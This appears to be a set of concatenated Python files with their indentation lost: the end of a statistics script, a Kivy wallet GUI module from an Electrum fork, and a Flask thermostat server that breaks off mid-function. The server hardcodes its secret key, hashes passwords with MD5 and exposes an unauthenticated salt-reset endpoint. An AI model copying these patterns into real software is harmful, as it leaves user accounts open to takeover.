'--json', default='counts.json',
help='File containing raw data; default: %default')
parser.add_option('-v', '--verbose', action='count', default=0)
options, args = parser.parse_args()
if args:
parser.error('Unsupported argument %s' % args)
logging.basicConfig(level=logging.DEBUG if options.verbose else logging.ERROR)
start = parse_time_option(options.start)
end = parse_time_option(options.end)
print('From %s to %s' % (start, end))
if options.swarming:
data = fetch_data(options.swarming, start, end, options.state, options.tags)
with open(options.json, 'wb') as f:
json.dump(data, f)
elif not os.path.isfile(options.json):
parser.error('--swarming is required.')
else:
with open(options.json, 'rb') as f:
data = json.load(f)
print('')
present(data, options.daily_count)
return 0
if __name__ == '__main__':
sys.exit(main())
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum
from electrum.bitcoin import TYPE_ADDRESS
from electrum import WalletStorage, Wallet
from electrum_gui.kivy.i18n import _
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword
from electrum.plugins import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register a widget cache for keeping memory use down; the timeout is set so
# the cached data is kept forever
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum.bitcoin import NetworkConstants
pp = servers.get(host, NetworkConstants.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mFLO')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
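# Worked example for the three helpers above (assuming base_unit 'mFLO', i.e.
# decimal_point() == 5, and an exchange rate of 100): get_amount('25 mFLO')
# -> int(10**5 * 25) == 2500000 satoshis, so btc_to_fiat('25') ->
# 2500000 * 100 / 10**8 == 2.5 -> '2.5'; fiat_to_btc('2.5') performs the
# inverse and formats the result back in mFLO.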
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Current screen orientation of the device the app is running on.
Can be one of `landscape` or `portrait`.
:data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so that updates happen at most 2 times a second
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
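# In short: a bare address or a "bitcoin:" URI opens the send screen
# pre-filled via set_URI(); anything else is tried as a base43-encoded raw
# transaction (the encoding Electrum uses for its own QR export) and shown in
# the transaction dialog if it deserializes; otherwise an error is shown.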
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.on_resume()
def load_wallet_by_name(self, path):
if not path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet != self.wallet:
self.stop_wallet()
self.load_wallet(wallet)
self.on_resume()
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
        '''Initialize the UX part of Electrum. This function performs the
        basic tasks of setting up the UI.
        '''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging (%d blocks)"%server_lag)
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
status = str(text.strip() + ' ' + self.base_unit)
else:
status = _("Disconnected")
n = self.wallet.basename()
self.status = '[size=15dp]%s[/size]\n%s' %(n, status)
#fiat_balance = self.fx.format_amount_and_units(c+u+x) or ''
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
            Logger.error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
# workaround p4a bug:
# show an empty info bubble, to refresh the display
self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None)
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
        ''' Show an error message bubble.
        '''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
        ''' Show an info message bubble.
        '''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
        '''Show an information bubble.

        .. parameters::
            text: message to be displayed
            pos: position of the bubble
            duration: duration the bubble remains on screen. 0 = click to hide
            width: width of the bubble
            arrow_pos: arrow position of the bubble
        '''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
@profiler
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def protected(self, msg, f, args):
if self.wallet.has_password():
self.password_dialog(msg, f, args)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = os.path.basename(self.wallet.storage.path)
self.protected(_("Enter your PIN code to confirm deletion of %s") % basename, self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def change_password(self, cb):
if self.wallet.has_password():
self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
else:
self._change_password(cb, None)
def _change_password(self, cb, old_password):
if self.wallet.has_password():
if old_password is None:
return
try:
self.wallet.check_password(old_password)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))
def _change_password2(self, cb, old_password, new_password):
self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))
def _change_password3(self, cb, old_password, new_password, confirmed_password):
if new_password == confirmed_password:
self.wallet.update_password(old_password, new_password)
cb()
else:
self.show_error("PIN numbers do not match")
def password_dialog(self, msg, f, args):
from .uix.dialogs.password_dialog import PasswordDialog
def callback(pw):
Clock.schedule_once(lambda x: f(*(args + (pw,))), 0.1)
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(msg, callback)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
Server.py
|
#!/usr/bin/python3
import flask
import os
import pickle
import time
from urllib import request
from urllib.error import HTTPError, URLError
import json
import threading
from hashlib import md5 # Super secure
import random
import logging
import shutil
from IO import IO
from logging.handlers import RotatingFileHandler
app = flask.Flask(__name__)
# Use this line to force cookies to expire
# every time the application is restarted
# app.secret_key = os.urandom(32)
app.secret_key = ' bbace2c841d9a06f382d1e4f5a97dc3d'
#app.debug = True
def storeobject(obj_name, obj):
with open('pickledb/%s.pickle' % obj_name, 'wb') as file:
pickle.dump(obj, file, pickle.HIGHEST_PROTOCOL)
def loadobject(obj_name):
with open('pickledb/%s.pickle' % obj_name, 'rb') as file:
obj = pickle.load(file)
return obj
def getoutsidetemp():
props = loadobject('props')
url = 'http://api.worldweatheronline.com/free/v2/weather.ashx'
url += '?key=%s&q=%s&num_of_days=0&format=json' % (
loadobject('weather_api_key'), loadobject('location'))
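    # Assumed response shape (illustrative), matching the indexing below:
    #   {"data": {"current_condition": [{"temp_C": "21", "temp_F": "70", ...}]}}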
try:
        data = json.loads(request.urlopen(url, timeout=3).read().decode('utf-8'))
return data['data']['current_condition'][0]['temp_%s' % props['units']]
except (HTTPError, URLError) as e:
logging.warning(e.args[0])
return "err"
def periodicrun():
day_map = [('Sa', '5'), ('F', '4'), ('Th', '3'),
('W', '2'), ('T', '1'), ('M', '0'), ('S', '6')]
i = 0
while True:
time.sleep(1)
i += 1
props = loadobject('props')
if i % 60 == 0:
props['temp_outside'] = getoutsidetemp()
storeobject('props', props)
if i % 5 == 0:
props['temp_inside'] = '%.1f' % IO.gettemp()
storeobject('props', props)
if i % 10 == 0:
            storeobject('props', props)
if props['status_ac'] == 'on':
IO.setac(1)
if props['status_ac'] == 'off':
IO.setac(0)
if props['status_ac'] == 'auto':
IO.setac(0) if IO.gettemp() < props['trigger_temp'] else IO.setac(1)
if props['status_heat'] == 'on':
IO.setheat(1)
if props['status_heat'] == 'off':
IO.setheat(0)
if props['status_heat'] == 'auto':
IO.setheat(0) if IO.gettemp() > props['trigger_temp'] else IO.setheat(1)
if props['status_fan'] == 'on':
# 'auto' is managed by IO.set__ to ensure it is always on when the ac or heat is.
IO.setfan(1)
if i % 31 == 0:
t = time.localtime()
year, month, day, hour, minute = t[:5]
weekday = t[6]
for event in props['events']:
# Event format: ['weekday <SMTWThFSa>', 'time <HHMM>',
# 'ac|heat|fan', 'auto|on|off', 'temp <TT>', 'F|C']
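                # Example (illustrative): ['MTWTh', '0730', 'heat', 'auto', '68']
                # sets the heater to auto mode at 07:30 on Mon-Thu with a
                # trigger temperature of 68.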
weekdays = event[0]
for d in day_map:
weekdays = weekdays.replace(d[0], d[1])
if str(weekday) not in weekdays:
continue
t = event[1] # Time format: 'hhmm'
if int(t[:2]) != hour or int(t[2:]) != minute:
continue
# Time for an event! Do something?
if (event[2] not in ('ac', 'heat', 'fan') or
event[3] not in ('on', 'off', 'auto')):
continue
props['status_%s' % event[2]] = event[3]
if event[4].isdecimal():
props['trigger_temp'] = int(event[4])
storeobject('props', props)
def gensecret():
return ''.join(chr(random.randint(97, 122)) for i in range(64))
@app.route('/apigensalt', methods=['GET'])
def apigensecret():
    user = flask.request.args['user']
    api_user_salts = loadobject('api_user_salts')
    api_user_salts[user] = gensecret()
    storeobject('api_user_salts', api_user_salts)
    return api_user_salts[user]
def validateuser():
if 'current_user' not in flask.session or not flask.session['current_user']:
return False
try:
prev_ip = flask.session['last_seen_ip']
except KeyError:
prev_ip = None
if prev_ip != flask.request.remote_addr:
return False
return True
def checkpassword(user, password_md5, secret_salt):
"""password_md5 should already be an md5 sum of the user's password,
then md5'd again with the secret key before being sent over http"""
with open('passwords.txt', 'r') as f:
passwords = dict(line.split(':') for line in f.read().split())
if password_md5 == md5((passwords[user] + secret_salt).encode('utf-8')).hexdigest():
return True
return False
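# Illustrative sketch (not called by the server; the name is hypothetical):
# how a client would derive the password_md5 value that checkpassword()
# expects. Assumes passwords.txt stores md5(password) hex digests, as written
# by onstart().
def _example_client_password_hash(plain_password, secret_salt):
    stored_hash = md5(plain_password.encode('utf-8')).hexdigest()
    return md5((stored_hash + secret_salt).encode('utf-8')).hexdigest()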
@app.before_first_request
def onstart():
# Use this function to initialize modules and global vars
os.chdir('/srv/thermopi/')
logging.basicConfig(filename='history.log', level=logging.DEBUG,
format='%(asctime)s %(message)s')
props = {}
days_short = {'sunday': 'S', 'monday': 'M', 'tuesday': 'T', 'wednesday': 'W',
